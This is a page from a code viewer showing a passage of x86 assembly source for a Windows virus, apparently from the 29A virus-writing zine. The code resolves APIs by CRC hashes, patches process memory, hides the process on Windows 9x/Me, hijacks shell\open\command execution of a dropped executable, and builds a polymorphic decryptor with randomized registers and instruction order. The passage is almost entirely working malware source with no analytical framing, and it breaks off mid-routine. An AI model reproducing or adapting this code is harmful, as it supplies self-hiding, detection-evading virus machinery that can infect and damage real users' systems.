📄 29a-7.002
字号:
call store_restore
orgbytes label near
db decsize dup (90h)
;-----------------------------------------------------------------------------
;WriteProcessMemory() is best to alter bytes because VirtualProtect() can fail
;-----------------------------------------------------------------------------
store_restore label near
mov esi, offset restore_loc
push esi
call dword ptr [ebx + 4 + size regcrcstk + expcrcstk.pGetCurrentProcess]
push eax
call dword ptr [ebx + 4 + size regcrcstk + expcrcstk.pWriteProcessMemory]
store_popsize label near
add esp, 'rgb!'
org $ - 4
dd popsize
push esi
pop esi
popad
jmp dword ptr [esp - 24h] ;no stack change in ring 3
;(except in some debuggers)
;-----------------------------------------------------------------------------
;virus code begins here in dropped exe
;-----------------------------------------------------------------------------
efishnc_exe label near
call walk_seh
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
execrcbegin label near ;place < 80h bytes from call for smaller code
dd (execrc_count + 1) dup (0)
execrcend label near
dd offset load_user32 - offset execrcend + 4
load_user32 label near
call skip_user32
db "user32", 0
skip_user32 label near
call dword ptr [esp + execrcstk.eLoadLibraryA + 4]
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
usrcrcbegin label near ;place < 80h bytes from call for smaller code
dd (usrcrc_count + 1) dup (0)
usrcrcend label near
dd offset get_cmdline - offset usrcrcend + 4
;-----------------------------------------------------------------------------
;determine platform and dynamically select function types (ANSI or Unicode)
;-----------------------------------------------------------------------------
get_cmdline label near
mov ebx, esp
call dword ptr [ebx + size usrcrcstk + execrcstk.eGetVersion]
shr eax, 1fh
lea esi, dword ptr [eax * 4 + ebx]
;-----------------------------------------------------------------------------
;RegisterServiceProcess() if 9x/Me (just sets one bit)
;-----------------------------------------------------------------------------
mov ecx, dword ptr fs:[tib.TibTeb]
or byte ptr [ecx + teb.procflags + 1], al
;-----------------------------------------------------------------------------
;parse command-line in platform-independent way to see how file was run
;-----------------------------------------------------------------------------
dec ax
mov al, 0ffh
xchg edi, eax ;ffff if Unicode, 00ff if ANSI
call dword ptr [esi + size usrcrcstk + execrcstk.eGetCommandLineW]
stack_delta label near
mov ebp, dword ptr [eax]
and ebp, edi
cmp ebp, '"' ;Unicode-compatible compare
je skip_argv0
push ' '
pop ebp
skip_argv0 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW]
mov ecx, dword ptr [eax]
and ecx, edi
je argv1_skip
cmp ecx, ebp
jne skip_argv0
find_argv1 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW]
mov ecx, dword ptr [eax]
and ecx, edi
cmp ecx, ' ' ;Unicode-compatible compare
je find_argv1
argv1_skip label near
;-----------------------------------------------------------------------------
;if argv1 exists then argv0 was run using shell\open\command so run argv1
;-----------------------------------------------------------------------------
jecxz stack_copy
sub esp, size processinfo
mov edx, esp
sub esp, size startupinfo
mov ecx, esp
push edx
push ecx
xor edx, edx
push edx
push edx
push edx
push edx
push edx
push edx
push eax
push edx
push ecx
call dword ptr [esi + size usrcrcstk + execrcstk.eGetStartupInfoW]
call dword ptr [esi + size usrcrcstk + execrcstk.eCreateProcessW]
call dword ptr [ebx + size usrcrcstk + execrcstk.eExitProcess]
;-----------------------------------------------------------------------------
;allocate stack space for RNG cache
;-----------------------------------------------------------------------------
stack_copy label near
call dword ptr [ebx + size usrcrcstk.execrcstk.eGetTickCount]
;RNG seed
enter (statelen + 1) shl 2, 0 ;RNG cache
mov edi, esp
mov ebx, dword ptr [ebx + size usrcrcstk + execrcstk.eGlobalAlloc]
push ebx ;save for kernel base later
;-----------------------------------------------------------------------------
;feersum endjinn2 - polymorphic decryptor with random line order
;-----------------------------------------------------------------------------
call randinit
push decsize + tblsize + grbgsize + tblsize + grbgsize + vsize + randsize + grbgsize
push GMEM_ZEROINIT
call ebx
push eax
mov dword ptr ds:[offset store_decsrc - offset efishnc_inf + expsize + 401001h], eax
add eax, decsize
mov ebx, eax
inc ah ;include old xlat table size
mov dword ptr ds:[offset store_copysrc - offset efishnc_inf + expsize + 401001h], eax
mov esi, eax
xchg edi, eax
mov edx, offset random - offset efishnc_inf + expsize + 401000h
call edx
and eax, grbgsize - 1
add esi, eax ;table offset
call edx
and eax, grbgsize - 1
inc ah ;include new xlat table size
lea ebp, dword ptr [esi + eax] ;buffer offset
call edx
test al, 1
je init_table
mov ebp, esi ;buffer offset
call edx
and eax, randsize - 1
lea esi, dword ptr [ebp + eax + vsize]
;table offset
init_table label near
mov dword ptr ds:[offset store_encdst - offset efishnc_inf + expsize + 401001h], ebp
mov ecx, grbgsize + tblsize + grbgsize + vsize + randsize + grbgsize
init_buffer label near
call edx
stos byte ptr [edi]
loop init_buffer
;-----------------------------------------------------------------------------
;bit table is constant time, and much faster than scasb with increasing range
;-----------------------------------------------------------------------------
fill_table label near
call edx
movzx eax, al
bts dword ptr [ebx - (tblsize shr 3)], eax
jb fill_table ;already in table
mov byte ptr [ebx + ecx], al
inc cl
jne fill_table ;fill with 256 unique values
transform label near
mov al, cl
xlat byte ptr [ebx]
mov byte ptr [esi + eax], cl
inc cl
jne transform
call edx
and eax, state_decdown
xchg ebx, eax
call edx
and al, state_esifirst
or bl, al
call edx
and al, state_pushret
je skip_pushb
or bl, al
call edx
test bl, state_decdown
jne skip_pushb
and al, state_pushb
or bl, al
skip_pushb label near
call edx
and al, state_movesi
or bl, al
call edx
and al, state_movedi
or bl, al
call edx
and al, state_jg
or bl, al
;-----------------------------------------------------------------------------
;select random register from ecx, edx, esi, edi (if not stosb)
;-----------------------------------------------------------------------------
rand_reg1 label near
call edx
and al, 7
cmp al, 1 ;ecx
je save_reg1
cmp al, 2 ;edx
je save_reg1
cmp al, 6 ;esi
je save_reg1
cmp al, 7 ;edi
jne rand_reg1
test bl, state_movedi
je rand_reg1 ;no edi if stosb
save_reg1 label near
xchg edx, eax
xchg edi, eax
;-----------------------------------------------------------------------------
;select random register from ecx, edx, esi (if not lodsb), edi
;-----------------------------------------------------------------------------
rand_reg2 label near
call edi
and al, 7
cmp al, dl
je rand_reg2 ;no register in use
cmp al, 1 ;ecx
je save_reg2
cmp al, 2 ;edx
je save_reg2
cmp al, 7 ;edi
je save_reg2
cmp al, 6
jne rand_reg2 ;no eax, ebx, ebp
test bl, state_movesi
je rand_reg2 ;no esi if lodsb
save_reg2 label near
mov dh, al
call edi
pop edi
push edx
push ebp ;buffer offset
and eax, (randsize - 1) and -4 ;dword align
mov ecx, eax ;random extra size
add ax, small vsize ;64kb limit
mov ebp, eax ;enter size
add ax, popsize
mov dword ptr ds:[offset store_popsize - offset efishnc_inf + expsize + 401002h], eax
mov al, 60h ;pushad
stos byte ptr [edi]
store_block1 label near
call random
and eax, block1and
cmp al, block1cmp
jnb store_block1
call callblock1
;-----------------------------------------------------------------------------
;block 1 contains: mov ebx/ecx/edx/esi, lea ecx/edx/esi/ebx, enter, mov ecx/edx/edi
;std (if down direction) and possibly push (if using ret to jump)
;randomly cmc/stc/cld (if up direction)
;example 1:
;enter vsize + random size, 0
;std
;mov esi, offset encrypted block end + random size
;push esp
;mov edi, ebp
;lea ebx, dword ptr [esi + offset xlat table]
;example 2:
;mov ebx, offset xlat table
;enter vsize + random size, 0
;lea esi, dword ptr [ebx + offset encrypted block begin]
;mov edi, esp
;example 3:
;mov edx, offset encrypted block begin
;lea ebx, dword ptr [edx + offset xlat table]
;enter vsize + random size, 0
;mov edi, esp
;cmc
;push edi
;-----------------------------------------------------------------------------
procblock1 label near
dw offset storeebx - offset procblock1
dw offset storeesi - offset procblock1
dw offset storeenter - offset procblock1
dw offset storeedi - offset procblock1
dw offset storestd - offset procblock1
dw offset storepushb - offset procblock1
callblock1 label near
pop edx
movzx eax, word ptr [eax * 2 + edx]
add eax, edx
call eax
cmp bh, block1done
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -